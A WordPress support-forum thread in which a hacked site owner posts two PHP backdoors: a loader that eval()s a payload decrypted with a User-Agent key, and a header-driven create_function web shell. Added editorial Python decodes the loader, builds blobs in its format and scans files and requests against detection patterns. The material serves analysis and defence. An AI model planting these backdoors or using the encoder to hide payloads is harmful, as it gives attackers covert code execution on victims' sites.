• Our WordPress site was infected or hacked with some kind of malicious code.

    This is what I got. Do you know what kind of virus is it and how to clean the site? Thanks!

    <?php
    
    /*
    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
    */
    // Read this file's own source and pull the base64 blob out of the first /* ... */ comment above.
    $file = __FILE__;
    $str = file_get_contents($file);
    if (preg_match('#/\*(.*?)\*/#si', $str, $match))
        $string = trim($match[1]);
    else
        exit;
    // The key is the MD5 hex of the request's User-Agent: only the attacker's UA decrypts the payload.
    $key = $_SERVER['HTTP_USER_AGENT'];
    $key = md5($key);
    $key_length = strlen($key);
    $string = base64_decode($string);
    $string_length = strlen($string);
    $rndkey = $box = array();
    $result = '';
    // $box[$i] = ord($key[$i % 32]); read through $box[$i % 256] below, this is a 32-byte repeating-key XOR.
    for ($i = 0; $i <= 800; $i++) {
        $box[$i] = ord($key[$i % $key_length]);
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $result .= chr(ord($string[$i]) ^ ($box[$i % 256]));
    }
    // The first 8 chars are an MD5 tag over payload + key; on a match the payload is eval()'d, otherwise nothing happens.
    if (substr($result, 0, 8) == substr(md5(substr($result, 8) . $key), 0, 8)) {
        $result = substr($result, 8);
        eval($result);
    }

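To show what the loader in the post above actually does, here is an added Python re-implementation of its decryption step. This is editorial example code, not from the thread, from WordPress or from the malware itself. It assumes a made-up attacker User-Agent and a harmless stand-in payload, because the real base64 blob was removed from the post; encode_payload exists only to build that sample. Two points the PHP hides: the $box setup looks like RC4 key scheduling, but since $box[$i % 256] reads a 256-entry window filled from a 32-character key, it reduces to XOR with the MD5 hex digest of the User-Agent repeated; and the 8-character MD5 tag means the file does nothing for any other visitor, so fetching the page with a scanner tells you nothing. With a User-Agent taken from the access log, the payload can be decoded offline instead of letting eval() run it.

```python
import base64
import hashlib
import re
from typing import Optional, Tuple


def derive_key(user_agent: str) -> str:
    # The loader keys everything on md5($_SERVER['HTTP_USER_AGENT']) as a
    # 32-character hex string.
    return hashlib.md5(user_agent.encode()).hexdigest()


def keystream_byte(key_hex: str, i: int) -> int:
    # PHP fills $box[0..800] with ord($key[$i % 32]) and reads $box[$i % 256].
    # 256 is a multiple of 32, so the stream is just the hex digest repeated.
    return ord(key_hex[i % len(key_hex)])


def xor_with_key(data: bytes, key_hex: str) -> bytes:
    return bytes(b ^ keystream_byte(key_hex, i) for i, b in enumerate(data))


def extract_blob(php_source: str) -> Optional[str]:
    # Same regex as the loader: the first /* ... */ comment in the file.
    m = re.search(r"/\*(.*?)\*/", php_source, re.S)
    return m.group(1).strip() if m else None


def decode_payload(blob_b64: str, user_agent: str) -> Optional[bytes]:
    """Recover the PHP code the loader would eval() for this User-Agent.

    Returns None when the 8-hex-char MD5 tag at the front does not match,
    which is exactly the case where the loader silently does nothing.
    """
    key = derive_key(user_agent)
    plain = xor_with_key(base64.b64decode(blob_b64), key)
    tag, body = plain[:8], plain[8:]
    expected = hashlib.md5(body + key.encode()).hexdigest()[:8].encode()
    return body if tag == expected else None


def encode_payload(php_code: bytes, user_agent: str) -> str:
    # Inverse operation, used here only to build a sample blob because the
    # real one was stripped from the post: tag first, then XOR, then base64.
    key = derive_key(user_agent)
    tag = hashlib.md5(php_code + key.encode()).hexdigest()[:8].encode()
    return base64.b64encode(xor_with_key(tag + php_code, key)).decode()


def build_sample_file(php_code: bytes, user_agent: str) -> str:
    # Constructed stand-in for the infected file: the decoy comment holding
    # the blob, followed by the start of the loader (abbreviated here).
    return ("<?php\n/*\n%s\n*/ $str = file_get_contents(__FILE__); // loader follows\n"
            % encode_payload(php_code, user_agent))


# Both values are constructed for this example; the real ones are unknown.
ATTACKER_UA = "Mozilla/5.0 (compatible; example-backdoor-client)"
SAMPLE_PAYLOAD = b"echo 'backdoor reached';"


def demo() -> Tuple[Optional[bytes], Optional[bytes]]:
    # Decode once with the attacker's User-Agent and once with another client.
    src = build_sample_file(SAMPLE_PAYLOAD, ATTACKER_UA)
    blob = extract_blob(src)
    return decode_payload(blob, ATTACKER_UA), decode_payload(blob, "curl/8.0")


if __name__ == "__main__":
    hit, miss = demo()
    print("attacker UA ->", hit)
    print("other UA    ->", miss)
```

Run it as a script: the first line prints the sample payload, the second prints None, which is what a scanner or a browser with any other User-Agent gets from the real file. To use it on a real infected file, pass its source to extract_blob and try decode_payload with each distinct User-Agent seen in the access log around the suspicious requests.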

Viewing 7 replies - 1 through 7 (of 7 total)
  • Is this in your index.php file? If yes, reinstalling the WordPress core files should fix it. Other than this, look for unwanted files and folders under your accounts. If you do not need them, please download and remove them. Let us know the outcome.

    Note: Please make sure you backup the data.

    Moderator Yui

    (@fierevere)

    永子

    It's a generic web shell used to execute remote commands.

    There should be another vulnerability somewhere which allowed the remote attacker to install this shell, and possibly otherwise to infest your site with other kinds of malware.

    You can start with this article
    https://www.ads-software.com/documentation/article/faq-my-site-was-hacked/

    Thread Starter Adrian Ghio

    (@aghio)

    @fierevere, @milesweb thanks both for this info. I will check those links to see what else we can do with this.

    Till now, it looks clean…
    Thanks again.

    Thread Starter Adrian Ghio

    (@aghio)

    Here, more info…

    It looks like we were infected with “Trojan.PHP.Agent.gen.532”

    Thread Starter Adrian Ghio

    (@aghio)

    Now, more details…. I saw this in several php files:

    $_HEADERS = getallheaders();
    if (isset($_HEADERS['If-Modified-Since'])) {
        // The If-Modified-Since header names the function to call, the Sec-Websocket-Accept
        // header supplies its second argument ('' and a code string is the create_function
        // signature), and whatever that returns is then invoked.
        $dbx_convert = $_HEADERS['If-Modified-Since']('', $_HEADERS['Sec-Websocket-Accept']);
        $dbx_convert();
    }

    Does someone know what kind of trojan or malicious code this is?

    I really can't stop him…

    Thread Starter Adrian Ghio

    (@aghio)

    And this….

    return array('dependencies' => array('react', 'wc-price-format', 'wc-settings', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom', 'wp-element', 'wp-i18n', 'wp-polyfill', 'wp-primitives'), 'version' => 'aabdcaf2b8c977161222a8b795694ea1');
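A file scanner and a request check built from the indicators in this thread, added here as example code; it is not the forum's, WordPress's or any vendor's tool, and the sample files and requests it runs on are constructed, not taken from the infected site. The scanner looks for the traits the two snippets posted earlier share: a request header value called as a function, a variable invoked as a function, getallheaders(), create_function, eval() of anything but a string literal, keying on HTTP_USER_AGENT, a file reading its own source, and runtime base64_decode. Some of these are legitimate on their own (caching code reads getallheaders() too), so a file is reported only when at least two fire. A file that only returns a literal array, which is the shape of a WordPress *.asset.php script manifest like the snippet directly above, never trips it. The request check flags an If-Modified-Since value that is not an HTTP-date and any client that sends Sec-WebSocket-Accept, which is a server response header; those are the two conditions the header-driven backdoor needs to fire.

```python
import re
from typing import Dict, List, Tuple

# Source-level indicators drawn from the two snippets posted in this thread.
# Any single one can appear in legitimate code, so files are reported only
# when at least `threshold` of them fire.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    # a request header or $_SERVER entry used directly as the function name
    ("header_value_called_as_function",
     re.compile(r"\$_(?:HEADERS|SERVER)\s*\[[^\]]+\]\s*\(")),
    # a variable holding a callable is invoked:  $dbx_convert();
    ("variable_function_invoked", re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\)\s*;")),
    ("getallheaders", re.compile(r"\bgetallheaders\s*\(\s*\)")),
    ("create_function", re.compile(r"\bcreate_function\s*\(")),
    # eval() whose argument is not a string literal
    ("eval_of_non_literal", re.compile(r"\beval\s*\((?!\s*['\"])")),
    ("user_agent_as_key", re.compile(r"HTTP_USER_AGENT")),
    # the file reads its own source (to pull a payload out of a comment)
    ("reads_own_source", re.compile(r"file_get_contents\s*\(\s*__FILE__\s*\)")),
    ("base64_decode_runtime", re.compile(r"\bbase64_decode\s*\(")),
]


def scan_source(src: str) -> List[str]:
    return [name for name, rx in INDICATORS if rx.search(src)]


def scan_sources(files: Dict[str, str], threshold: int = 2) -> Dict[str, List[str]]:
    report = {}
    for path, src in files.items():
        hits = scan_source(src)
        if len(hits) >= threshold:
            report[path] = hits
    return report


# IMF-fixdate (RFC 7231), the form browsers send; the obsolete RFC 850 and
# asctime forms would need adding if old clients matter.
HTTP_DATE = re.compile(
    r"^[A-Z][a-z]{2}, \d{2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}:\d{2} GMT$")


def suspicious_request(headers: Dict[str, str]) -> List[str]:
    """Reasons a request matches the header-driven backdoor's trigger shape."""
    h = {k.lower(): v for k, v in headers.items()}
    reasons = []
    ims = h.get("if-modified-since")
    if ims is not None and not HTTP_DATE.match(ims):
        reasons.append("If-Modified-Since is not an HTTP-date: %r" % ims)
    if "sec-websocket-accept" in h:
        # Sec-WebSocket-Accept is sent by servers (RFC 6455), never by clients.
        reasons.append("client sent Sec-WebSocket-Accept")
    return reasons


# Constructed sample files: two modelled on the posted snippets, one asset
# manifest, one legitimate conditional-GET handler.
SAMPLE_FILES = {
    "backdoor-headers.php": (
        "<?php $_HEADERS=getallheaders();if(isset($_HEADERS['If-Modified-Since']))"
        "{$dbx_convert=$_HEADERS['If-Modified-Since']('', $_HEADERS['Sec-Websocket-Accept']);"
        "$dbx_convert();}"
    ),
    "decoy-decoder.php": (
        "<?php\n/*\nQ0ZHRE (placeholder blob)\n*/ $str = file_get_contents(__FILE__);\n"
        "$key = md5($_SERVER['HTTP_USER_AGENT']); $s = base64_decode(trim($m[1]));\n"
        "if (substr($r,0,8) == substr(md5(substr($r,8).$key),0,8)) eval(substr($r,8));\n"
    ),
    "blocks.asset.php": (
        "<?php return array('dependencies' => array('react', 'wp-element'),"
        " 'version' => 'aabdcaf2b8c977161222a8b795694ea1');"
    ),
    "legit-cache.php": (
        "<?php $h = getallheaders();\n"
        "if (isset($h['If-Modified-Since']) && strtotime($h['If-Modified-Since']) >= $mtime) {\n"
        "    header('HTTP/1.1 304 Not Modified'); exit;\n}\n"
    ),
}

# Constructed requests: a normal conditional GET and the backdoor's trigger.
NORMAL_REQUEST = {"Host": "example.test", "User-Agent": "Mozilla/5.0",
                  "If-Modified-Since": "Sat, 29 Oct 1994 19:43:31 GMT"}
BACKDOOR_REQUEST = {"Host": "example.test", "User-Agent": "Mozilla/5.0",
                    "If-Modified-Since": "create_function",
                    "Sec-Websocket-Accept": "echo 'reached';"}

if __name__ == "__main__":
    for path, hits in scan_sources(SAMPLE_FILES).items():
        print(path, "->", ", ".join(hits))
    for label, req in (("normal", NORMAL_REQUEST), ("backdoor", BACKDOOR_REQUEST)):
        print(label, "->", suspicious_request(req) or "clean")
```

Running the script reports backdoor-headers.php and decoy-decoder.php and nothing for the manifest or the caching file; to scan a real tree, build the dict from os.walk over wp-content and wp-includes and review anything reported by hand, since the regexes are indicators, not proof. The request check is the kind of rule a WAF or access-log filter can apply to catch the trigger before the file is even found.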

    You should try using Malcare or Sucuri and clean the files if they are infected. Another option is to consider using WAF protection or a real-time scanning option which would clean and quarantine the files automatically.

  • The topic ‘WordPress infected/hacked’ is closed to new replies.